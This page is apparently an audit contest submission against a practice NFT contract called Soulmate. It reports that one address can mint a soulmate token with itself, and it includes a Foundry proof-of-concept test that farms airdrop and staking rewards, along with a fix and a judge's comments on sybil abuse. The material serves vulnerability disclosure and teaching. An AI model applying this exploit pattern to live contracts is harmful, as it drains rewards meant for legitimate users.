First Flight #9: Soulmate
First Flight #9
Beginner FriendlyFoundryNFT
100 EXP
View results
Previous Next
Submission Details
Severity: medium
Valid

`Soulmate::mintSoulmateToken()` Accepts Same Address For Minting Soulmate NFT

mdasifahamed

Description: Soulmate::mintSoulmateToken() does not checks for same user to match for soulmate. Same user can be soulmate to himself and it allows him to claim LoveToken From Airdrop Also he can deposit to Staking contract and
able to receive LoveToken as reward for staking tokens.

Impact: A malicious actor can create multiple wallet address and using a single address for twice can mint soulmate. using each address calling twice Soulmate::mintSoulmateToken() can mint soulmate for all the addresses. Start claiming airdrops and rewards and in the end of the day real couple may not get airdop lovetoken because airdrop token was limited.

Proof of Concept: Proof Code is given below for the issue.

POC For Same User Minting
function test_SameUserCanLoveMintToken() public {
address user1 = makeAddr("user1");
vm.startPrank(user1);
soulmateContract.mintSoulmateToken();
vm.stopPrank();
vm.startPrank(user1);
soulmateContract.mintSoulmateToken();
vm.stopPrank();
assertEq(soulmateContract.soulmateOf(user1), soulmateContract.soulmateOf(user1));
// even can claim airdrops, deposit lovetoken also can claim loveTokens As Reward for staking
vm.warp(block.timestamp + 7 days + 1 seconds);
vm.startPrank(user1);
airdropContract.claim();
vm.stopPrank();
assertEq(loveToken.balanceOf(user1), 7 ether);
vm.startPrank(user1);
loveToken.approve(address(stakingContract), 2 ether);
stakingContract.deposit(2 ether);
// I am doing the Below Line of Code Beacuse i Know the calimReward() has issues
// for this this we don't need to wait for 1 week calimReward() will do that for us for its vunrabilty.
stakingContract.claimRewards();
stakingContract.withdraw(2 ether);
vm.stopPrank();
assertEq(loveToken.balanceOf(user1), 9 ether);

Recommended Mitigation: The isssue can be mitigated by adding a chkes before assinging solumate by updating
Soulmate::mintSoulmateToken() function.

function mintSoulmateToken() public returns (uint256) {
// Check if people already have a soulmate, which means already have a token
address soulmate = soulmateOf[msg.sender];
if (soulmate != address(0))
revert Soulmate__alreadyHaveASoulmate(soulmate);
address soulmate1 = idToOwners[nextID][0];
address soulmate2 = idToOwners[nextID][1];
if (soulmate1 == address(0)) {
idToOwners[nextID][0] = msg.sender;
ownerToId[msg.sender] = nextID;
emit SoulmateIsWaiting(msg.sender);
} else if (soulmate2 == address(0)) {
idToOwners[nextID][1] = msg.sender;
+ if(idToOwners[nextID][0] == idToOwners[nextID][1]){
+ revert("Same user");
+ };
// Once 2 soulmates are reunited, the token is minted
ownerToId[msg.sender] = nextID;
soulmateOf[msg.sender] = soulmate1;
soulmateOf[soulmate1] = msg.sender;
idToCreationTimestamp[nextID] = block.timestamp;
emit SoulmateAreReunited(soulmate1, soulmate2, nextID);
_mint(msg.sender, nextID++);
}
return ownerToId[msg.sender];
}
Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-self-soulmate

- Given the native anonymous nature of blockchain in general, this issue cannot be avoided unless an explicit whitelist is implemented. Even then we can only confirm soulmates are distinct individuals via kyc. I believe finding a soulmate is intended to be permisionless. - However, even though sufficient (500_000_000e18 in each vault) tokens are minted to claim staking and airdrop rewards, it would take 500_000_000 / 2 combined weeks for airdrop vault to be drained which is not unreasonable given there are [80+ million existing wallets](https://coinweb.com/trends/how-many-crypto-wallets-are-there/). Given there is no option to mint new love tokens, this would actually ruin the functionality of the protocol of finding soulmates and shift the focus to abusing a sybil attack to farming airdrops instead. Assigning medium severity for now but am open for appeals otherwise, since most if not all issues lack indepth analysis of the issue.

mdasifahamed Submitter
over 1 year ago
0xnevi Lead Judge
over 1 year ago
0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-self-soulmate

- Given the native anonymous nature of blockchain in general, this issue cannot be avoided unless an explicit whitelist is implemented. Even then we can only confirm soulmates are distinct individuals via kyc. I believe finding a soulmate is intended to be permisionless. - However, even though sufficient (500_000_000e18 in each vault) tokens are minted to claim staking and airdrop rewards, it would take 500_000_000 / 2 combined weeks for airdrop vault to be drained which is not unreasonable given there are [80+ million existing wallets](https://coinweb.com/trends/how-many-crypto-wallets-are-there/). Given there is no option to mint new love tokens, this would actually ruin the functionality of the protocol of finding soulmates and shift the focus to abusing a sybil attack to farming airdrops instead. Assigning medium severity for now but am open for appeals otherwise, since most if not all issues lack indepth analysis of the issue.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.